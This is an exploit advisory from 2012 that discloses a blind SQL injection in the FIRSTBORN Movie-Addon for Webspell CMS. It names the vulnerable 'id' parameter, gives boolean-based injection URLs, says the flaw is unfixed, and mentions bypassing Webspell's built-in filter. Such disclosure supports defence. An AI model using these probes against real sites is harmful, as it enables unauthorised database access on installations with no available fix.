1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
======================================================================================== | # Title: Webspell FIRSTBORN Movie-Addon Blind SQL Injection Vulnerability | # Author : Easy Laster | # Script : Webspell FIRSTBORN Movie-Addon | # Site : www.firstborn.de | # Price: free | # Exploitation : Remote Blind SQL Vulnerability | # Bug: Remote Blind SQL Vulnerability | # Date : 08.06.2012 | # Language : PHP | # Status : vulnerable | # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, ezah, Manifest ======================Proof of Concept ================================= [+] Introduction FIRSTBORN Movie-Addon is a Addon for the Webspell Web Application for Content Management System. In this Addon we found a Remote Blind SQL Injection vulnerability.The Movie file is Vulnerable and a high risk Bug.The Vulnerability is Not fixed from the coder.The most Webspell Webapplication has a Security System in the Webspell core self.You must bypass the core from Webspell Security System (globalskiller). [+] Vulnerability http://[host]/[path]/index.php?site=movies&action=show&id=[vul] [+] Exploit http://[host]/[path]/index.php?site=movies&action=show&id=1+and+1=1--+ http://[host]/[path]/index.php?site=movies&action=show&id=1+and+1=2--+ [+] Fix No fix. |